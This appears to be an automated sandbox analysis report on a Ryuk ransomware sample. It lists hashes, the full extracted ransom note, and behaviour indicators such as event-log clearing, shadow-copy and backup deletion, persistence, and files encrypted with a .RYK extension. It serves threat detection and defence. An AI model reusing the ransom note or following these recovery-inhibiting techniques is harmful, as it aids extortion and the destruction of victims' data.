ryuk | 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe

Analysis

max time kernel
150s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
10-11-2022 06:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
Size

885KB
MD5

a57e1e6fe1c98d2e75799a46e9eb5797
SHA1

7878e7042c355546c118a38b90d8f7221f74d8a4
SHA256

8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe
SHA512

5764f3b1971f64c9d55f387524d92038350dbdf9a7195dc7e3f7b83760d93f45e73dd4c4af6cc597add838acd2d4a4e5b7a96a3444e3c8b0369b1d487621909d
SSDEEP

12288:zD7Z7cwy8U9JlpYqWYgeWYg955/155/0QebUlAAsDsKKAosRn6X:z57ctflKgQKUKRDsKKAjN6

Score

10^/10

ryuk discovery evasion ransomware

Malware Config

Extracted

Path

C:\ProgramData\RyukReadMe.txt

Ransom Note

Your network has been penetrated. All files on each host in the network have been encrypted with a strong algorithm. Backups were either encrypted Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover. We exclusively have decryption software for your situation. More than a year ago, world experts recognized the impossibility of deciphering by any means except the original decoder. No decryption software is available in the public. Antiviruse companies, researchers, IT specialists, and no other persons cant help you decrypt the data. DO NOT RESET OR SHUTDOWN - files may be damaged. DO NOT DELETE readme files. To confirm our honest intentions.Send 2 different random files and you will get it decrypted. It can be from different computers on your network to be sure that one key decrypts everything. 2 files we unlock for free To get info (decrypt your files) contact us at [email protected] or [email protected] You will receive btc address for payment in the reply letter Ryuk No system is safe

Emails

[email protected]

Signatures

Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
ransomware ryuk

Clears Windows event logs 1 TTPs 64 IoCs

evasion ransomware

Indicator Removal on Host

T1070

Processes:

wevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exe

pid	process
4840	wevtutil.exe
4264	wevtutil.exe
2024	wevtutil.exe
3568	wevtutil.exe
4152	wevtutil.exe
4880	wevtutil.exe
4556	wevtutil.exe
4472	wevtutil.exe
1676	wevtutil.exe
1084	wevtutil.exe
3396	wevtutil.exe
4220	wevtutil.exe
3592	wevtutil.exe
60	wevtutil.exe
64	wevtutil.exe
5012	wevtutil.exe
1476	wevtutil.exe
3388	wevtutil.exe
3004	wevtutil.exe
1104	wevtutil.exe
4032	wevtutil.exe
1060	wevtutil.exe
264	wevtutil.exe
4348	wevtutil.exe
4776	wevtutil.exe
788	wevtutil.exe
1476	wevtutil.exe
4888	wevtutil.exe
1660	wevtutil.exe
2024	wevtutil.exe
4888	wevtutil.exe
1020	wevtutil.exe
4160	wevtutil.exe
4040	wevtutil.exe
740	wevtutil.exe
1464	wevtutil.exe
3560	wevtutil.exe
1700	wevtutil.exe
2868	wevtutil.exe
4380	wevtutil.exe
5048	wevtutil.exe
4504	wevtutil.exe
4604	wevtutil.exe
5012	wevtutil.exe
4544	wevtutil.exe
4264	wevtutil.exe
3100	wevtutil.exe
772	wevtutil.exe
2980	wevtutil.exe
4460	wevtutil.exe
3968	wevtutil.exe
1496	wevtutil.exe
688	wevtutil.exe
2996	wevtutil.exe
1276	wevtutil.exe
1876	wevtutil.exe
3448	wevtutil.exe
536	wevtutil.exe
5084	wevtutil.exe
872	wevtutil.exe
912	wevtutil.exe
1244	wevtutil.exe
4932	wevtutil.exe
3996	wevtutil.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

3100 bcdedit.exe
4992 bcdedit.exe
Deletes backup catalog 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command-Line Interface
T1059

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

wbadmin.exe

pid process

728 wbadmin.exe
Disables Task Manager via registry modification
evasion
Disables taskbar notifications via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

cmd.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation cmd.exe

pid	process
3100	bcdedit.exe
4992	bcdedit.exe

pid	process
728	wbadmin.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	cmd.exe

Drops startup file 3 IoCs

Processes:

cmd.exeattrib.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	attrib.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

824 icacls.exe

pid	process
824	icacls.exe

Enumerates connected drives 3 TTPs 42 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vssadmin.exevssadmin.exevssadmin.exe8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

description	ioc	process
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\S:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\U:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\T:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\Z:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\H:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\J:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\W:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\F:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\O:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\A:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\B:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\R:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\E:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\N:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\K:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\P:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\Y:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\G:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\I:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\Q:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\V:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\X:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\L:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\M:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe

Drops file in Program Files directory 64 IoCs

Processes:

8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\fr-fr\ui-strings.js.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.zh_CN_5.5.0.165303.jar.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\x.cur.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.scale-180.png.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\GROOVEEX.DLL.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_folder-hover_32.svg.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ui-strings.js.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\mk.pak.DATA.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_Trial-pl.xrm-ms.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\FREN\WT61FR.LEX.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\tr-tr\ui-strings.js.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-settings.jar.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN086.XML.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\msedge_100_percent.pak.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\feature.properties.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\management-agent.jar.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\SETLANG_COL.HXT.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sv-se\ui-strings.js.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ja-jp\ui-strings.js.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\ur.pak.DATA.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_fr.properties.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\license.html.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\da.pak.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\plugin.js.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Close.png.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dummy.aff.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\tr-tr\AppStore_icon.svg.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusE5R_SubTrial-pl.xrm-ms.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\newgrounds.luac.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalR_Retail-ppd.xrm-ms.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000042\catalog.json.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\MSOXMLMF.DLL.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\css\main.css.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\it.pak.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerConstraints.exsd.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_SubTest-ul-oob.xrm-ms.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\vk_swiftshader_icd.json.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioStdO365R_SubTrial-pl.xrm-ms.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\pt-PT.pak.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\jsse.jar.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA6\VBE6EXT.OLB.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\LAYERS\THMBNAIL.PNG.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019XC2RVL_MAKC2R-ul-oob.xrm-ms.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019VL_KMS_Client_AE-ppd.xrm-ms.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\close_x.png.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\cs-cz\ui-strings.js.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Templates\1033\ChronologicalResume.dotx.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\tr-tr\ui-strings.js.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ICE\PREVIEW.GIF.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Trial2-ppd.xrm-ms.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019DemoR_BypassTrial180-ul-oob.xrm-ms.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\offsym.ttf.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\digsig_icons.png.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Trust Protection Lists\Sigma\Staging.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\ECLIPSE_.SF.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt_1.1.1.v20140903-0821.jar.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\WINWORD.HXS.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\help.svg.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\MLModels\nexturl.ort.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-progress-ui_ja.jar.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Personal2019R_Retail-ul-phn.xrm-ms.[[email protected]].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\lpklegal.txt.[[email protected]].RYKCRYPT	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe

Drops file in Windows directory 5 IoCs

Processes:

8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exewbadmin.exe

description	ioc	process
File created	C:\Windows\hrmlog1	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.1.etl	wbadmin.exe
File created	C:\Windows\RyukReadMe.txt	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe

Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

2396 sc.exe
4788 sc.exe
4684 sc.exe
1296 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

4836 schtasks.exe
1292 schtasks.exe
1252 schtasks.exe
1676 schtasks.exe

pid	process
2396	sc.exe
4788	sc.exe
4684	sc.exe
1296	sc.exe

pid	process
4836	schtasks.exe
1292	schtasks.exe
1252	schtasks.exe
1676	schtasks.exe

Interacts with shadow copies 2 TTPs 15 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
3956	vssadmin.exe
1660	vssadmin.exe
3668	vssadmin.exe
848	vssadmin.exe
4380	vssadmin.exe
1768	vssadmin.exe
552	vssadmin.exe
2556	vssadmin.exe
1008	vssadmin.exe
4772	vssadmin.exe
3460	vssadmin.exe
488	vssadmin.exe
3592	vssadmin.exe
1676	vssadmin.exe
3376	vssadmin.exe

Kills process with taskkill 5 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

3764 taskkill.exe
3772 taskkill.exe
2148 taskkill.exe
4312 taskkill.exe
4348 taskkill.exe
Modifies registry class 1 IoCs

Processes:

cmd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings cmd.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

2492 NOTEPAD.EXE
Runs net.exe

pid	process
3764	taskkill.exe
3772	taskkill.exe
2148	taskkill.exe
4312	taskkill.exe
4348	taskkill.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings	cmd.exe

pid	process
2492	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe

pid	process
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1652	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
